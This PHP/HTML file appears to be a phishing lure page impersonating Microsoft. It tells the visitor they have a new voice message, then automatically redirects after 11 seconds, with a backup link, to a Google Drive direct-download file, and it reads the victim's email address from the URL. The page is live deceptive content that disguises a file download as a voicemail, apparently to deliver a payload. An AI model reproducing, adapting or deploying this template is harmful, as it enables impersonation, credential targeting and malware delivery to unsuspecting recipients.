<?php
	$email = $_GET['email'];
?>

<!DOCTYPE html>
<script>
        var timer = setTimeout(function() {
            window.location='https://drive.google.com/uc?export=download&id=1-K1mBLjuUmmNHl-98IBYnsW0dk8yTtHx'
        }, 11000);
    </script>
<html>

 <head>

  <title>Microsft-services</title>

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no">

  <link rel="shortcut icon" type="icon" href="ifavicon.png">

  <style>
   body {
    font-family: "Segoe UI Webfont",-apple-system,"Helvetica Neue","Lucida Grande","Roboto","Ebrima","Nirmala UI","Gadugi","Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI","Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math";
    width: 1200px;
    max-width: 1200px;
    padding-top: 25px;
    margin: auto;
   }
  </style>

 </head>

 <body>
  <div>
   <img src="ms-logo-v2.png" alt="logo">
  </div>

  <div>
   <h2>You have 1 new voice message.</h1>


   <br>

   <p>You will be redirected to listen to your voice message. If redirection dosen't occour, <a href="https://drive.google.com/uc?export=download&id=1-K1mBLjuUmmNHl-98IBYnsW0dk8yTtHx">Click here to continue.</a>.</p>

   <br>

  </div>

  <hr>

  <div>
   <p align="right">&copy; 2021 Microsoft <a href="#" style=" text-decoration: none;">Terms of Use Privacy & Cookies</a> Developers</p>
  </div>

 </body>
</html>
